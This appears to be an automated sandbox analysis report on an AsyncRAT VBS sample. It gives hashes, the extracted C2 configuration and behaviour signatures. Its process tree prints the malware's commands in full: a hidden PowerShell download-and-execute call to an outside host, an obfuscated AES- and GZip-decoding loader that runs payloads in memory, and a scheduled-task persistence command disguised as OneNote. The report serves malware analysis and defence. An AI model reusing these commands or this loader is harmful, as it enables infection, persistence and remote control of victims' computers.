Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 02:58
Static task
static1
Behavioral task
behavioral1
Sample
bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b.vbs
Resource
win7-20240903-en
General
-
Target
bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b.vbs
-
Size
49KB
-
MD5
50e3a17992c509fd34daf21f3d408733
-
SHA1
99001c7b061914c9caaf7ef2ba75f25ac3498d82
-
SHA256
bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b
-
SHA512
e21c89778aecaa7a532f5d953a87b6ed575a14788556b67b3311ffec188d492bd633773ee81879c1451cf6ed1ad4c189bf41f07fc8dbba72bd07103a53597849
-
SSDEEP
768:I+1zXj3HDb1sybJRpN9/NVAdEamHuaxBsgV29+DY9lYUP7bFQqrSwli:IIzTzL/vtNV/RHvM5ADeHFn0
Malware Config
Extracted
asyncrat
0.5.8
Default
38.255.42.40:1020
ZOmahQBSRciB
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4960-172-0x00000000053D0000-0x00000000053E2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 4 IoCs
flow pid Process 41 4960 powershell.exe 47 4960 powershell.exe 48 4960 powershell.exe 49 4960 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3572 powershell.exe 2540 powershell.exe 4256 powershell.exe 948 powershell.exe 3140 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1600 timeout.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3572 powershell.exe 3572 powershell.exe 2320 powershell.exe 2320 powershell.exe 2540 powershell.exe 2540 powershell.exe 3616 powershell.exe 3616 powershell.exe 4256 powershell.exe 4256 powershell.exe 4960 powershell.exe 4960 powershell.exe 948 powershell.exe 948 powershell.exe 3428 powershell.exe 3428 powershell.exe 3140 powershell.exe 3140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeIncreaseQuotaPrivilege 3616 powershell.exe Token: SeSecurityPrivilege 3616 powershell.exe Token: SeTakeOwnershipPrivilege 3616 powershell.exe Token: SeLoadDriverPrivilege 3616 powershell.exe Token: SeSystemProfilePrivilege 3616 powershell.exe Token: SeSystemtimePrivilege 3616 powershell.exe Token: SeProfSingleProcessPrivilege 3616 powershell.exe Token: SeIncBasePriorityPrivilege 3616 powershell.exe Token: SeCreatePagefilePrivilege 3616 powershell.exe Token: SeBackupPrivilege 3616 powershell.exe Token: SeRestorePrivilege 3616 powershell.exe Token: SeShutdownPrivilege 3616 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeSystemEnvironmentPrivilege 3616 powershell.exe Token: SeRemoteShutdownPrivilege 3616 powershell.exe Token: SeUndockPrivilege 3616 powershell.exe Token: SeManageVolumePrivilege 3616 powershell.exe Token: 33 3616 powershell.exe Token: 34 3616 powershell.exe Token: 35 3616 powershell.exe Token: 36 3616 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 powershell.exe Token: SeSecurityPrivilege 4256 powershell.exe Token: SeTakeOwnershipPrivilege 4256 powershell.exe Token: SeLoadDriverPrivilege 4256 powershell.exe Token: SeSystemProfilePrivilege 4256 powershell.exe Token: SeSystemtimePrivilege 4256 powershell.exe Token: SeProfSingleProcessPrivilege 4256 powershell.exe Token: SeIncBasePriorityPrivilege 4256 powershell.exe Token: SeCreatePagefilePrivilege 4256 powershell.exe Token: SeBackupPrivilege 4256 powershell.exe Token: SeRestorePrivilege 4256 powershell.exe Token: SeShutdownPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeSystemEnvironmentPrivilege 4256 powershell.exe Token: SeRemoteShutdownPrivilege 4256 powershell.exe Token: SeUndockPrivilege 4256 powershell.exe Token: SeManageVolumePrivilege 4256 powershell.exe Token: 33 4256 powershell.exe Token: 34 4256 powershell.exe Token: 35 4256 powershell.exe Token: 36 4256 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 powershell.exe Token: SeSecurityPrivilege 4256 powershell.exe Token: SeTakeOwnershipPrivilege 4256 powershell.exe Token: SeLoadDriverPrivilege 4256 powershell.exe Token: SeSystemProfilePrivilege 4256 powershell.exe Token: SeSystemtimePrivilege 4256 powershell.exe Token: SeProfSingleProcessPrivilege 4256 powershell.exe Token: SeIncBasePriorityPrivilege 4256 powershell.exe Token: SeCreatePagefilePrivilege 4256 powershell.exe Token: SeBackupPrivilege 4256 powershell.exe Token: SeRestorePrivilege 4256 powershell.exe Token: SeShutdownPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeSystemEnvironmentPrivilege 4256 powershell.exe Token: SeRemoteShutdownPrivilege 4256 powershell.exe Token: SeUndockPrivilege 4256 powershell.exe Token: SeManageVolumePrivilege 4256 powershell.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 5060 wrote to memory of 3572 5060 WScript.exe 82 PID 5060 wrote to memory of 3572 5060 WScript.exe 82 PID 5060 wrote to memory of 4968 5060 WScript.exe 93 PID 5060 wrote to memory of 4968 5060 WScript.exe 93 PID 4968 wrote to memory of 2000 4968 cmd.exe 95 PID 4968 wrote to memory of 2000 4968 cmd.exe 95 PID 2000 wrote to memory of 372 2000 cmd.exe 97 PID 2000 wrote to memory of 372 2000 cmd.exe 97 PID 2000 wrote to memory of 2320 2000 cmd.exe 98 PID 2000 wrote to memory of 2320 2000 cmd.exe 98 PID 2000 wrote to memory of 2320 2000 cmd.exe 98 PID 2320 wrote to memory of 2540 2320 powershell.exe 99 PID 2320 wrote to memory of 2540 2320 powershell.exe 99 PID 2320 wrote to memory of 2540 2320 powershell.exe 99 PID 2320 wrote to memory of 3616 2320 powershell.exe 100 PID 2320 wrote to memory of 3616 2320 powershell.exe 100 PID 2320 wrote to memory of 3616 2320 powershell.exe 100 PID 2320 wrote to memory of 4256 2320 powershell.exe 103 PID 2320 wrote to memory of 4256 2320 powershell.exe 103 PID 2320 wrote to memory of 4256 2320 powershell.exe 103 PID 2320 wrote to memory of 2944 2320 powershell.exe 105 PID 2320 wrote to memory of 2944 2320 powershell.exe 105 PID 2320 wrote to memory of 2944 2320 powershell.exe 105 PID 2944 wrote to memory of 2852 2944 cmd.exe 107 PID 2944 wrote to memory of 2852 2944 cmd.exe 107 PID 2944 wrote to memory of 2852 2944 cmd.exe 107 PID 2852 wrote to memory of 2584 2852 cmd.exe 109 PID 2852 wrote to memory of 2584 2852 cmd.exe 109 PID 2852 wrote to memory of 2584 2852 cmd.exe 109 PID 2852 wrote to memory of 4960 2852 cmd.exe 110 PID 2852 wrote to memory of 4960 2852 cmd.exe 110 PID 2852 wrote to memory of 4960 2852 cmd.exe 110 PID 4960 wrote to memory of 948 4960 powershell.exe 111 PID 4960 wrote to memory of 948 4960 powershell.exe 111 PID 4960 wrote to memory of 948 4960 powershell.exe 111 PID 2000 wrote to memory of 1600 2000 cmd.exe 112 PID 2000 wrote to memory of 1600 2000 cmd.exe 112 PID 4960 wrote to memory of 3428 4960 powershell.exe 113 PID 4960 wrote to memory of 3428 4960 powershell.exe 113 PID 4960 wrote to memory of 3428 4960 powershell.exe 113 PID 4960 wrote to memory of 3140 4960 powershell.exe 115 PID 4960 wrote to memory of 3140 4960 powershell.exe 115 PID 4960 wrote to memory of 3140 4960 powershell.exe 115
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "4⤵PID:372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network90481Man.cmd';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:2584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network90481Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3140
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:1600
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5928d36ad618a369ffebf44885d07cf81
SHA1edf5a353a919c1873af8e6a0dfafa4c38c626975
SHA256d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea
SHA5124ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a
-
Filesize
21KB
MD579d609d1be47c96768eb66eef89f10a0
SHA1dcf51cbe55995e0d5f033414d85bca7fdd088ee7
SHA256cd4e6f5fb97fad72edec38b406466827ecd83571e98927158a84a389037c6f1e
SHA5121a49e9d569edf4e9c88534ff64af379f4ed765f1865e8a7c05fa65f3c46a84711473a0df336ff55bd702f224b0351686d2a2ed38b91bebc6c22b19c0753d9166
-
Filesize
21KB
MD565562bf9be572f5b3420e172029c4d66
SHA1891466094ad686d123f433e2dd240c38e9d2cbe8
SHA256fcd0d9f45c2c018a213391d34da92003ebca89b2a340283796db306e2c23c0b1
SHA5122bb6d0ceb1009cdcacbd97c75e05f4a19075b0a0094670fbdc61bc19ebd1b2eba27651f1cf12ca105ec6b561b871c7afba73d2b976da9a888b8daf7a5c8c2bd6
-
Filesize
20KB
MD5b938fd8c3ca381615b2c173145e1588d
SHA1a8204710f0e3bd2cac51e6c994273d51ae0ecda7
SHA2562cf764eb42f307a0031d0d7e08dbba7a4cf7c935318e168f0b29d5a233d370f2
SHA51266c5660e140033f87aec8f66f4cf6d27d8c044c25efb9fd024cbedab66d5f0b1c861156664880ce179598a54a9478cfd118dd3ad86be9d2be8614bdf1626d972
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
20KB
MD5223274bded6be8ae1f4c3e7a7bf6e04a
SHA154e89b1b1baae5893b52b9a73511edca3231c256
SHA25661d37e8b7d40f7a838a5c06a74b1c9e789ffd96d46a7c689f9bfe92c6bf25955
SHA5125018ed640709f312f9ca4016dcb1eb1deb963cdab49531e6c118dfdbb0d917232c6bd057bbf2175d7cf277f8cba8bb02b46c7bd5d73bbe4fa7e4cd72f0a6a5be
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
48KB
MD583fba8b8c150fdd949067fc54f597aa1
SHA1fc6e442dba604453db6988950a09cd539c5f2ec8
SHA2567f5beae0e19c0836c3f6838dacbebab8a8811643156f1af13664ff4725989f25
SHA51211c852bb8d36a9e42beb5d42b3120bcec309ff751e60f750b8d35383b546285fd999450a13c238074228b8170d6efd16f238ec2c583964ee8393df23a201c1dd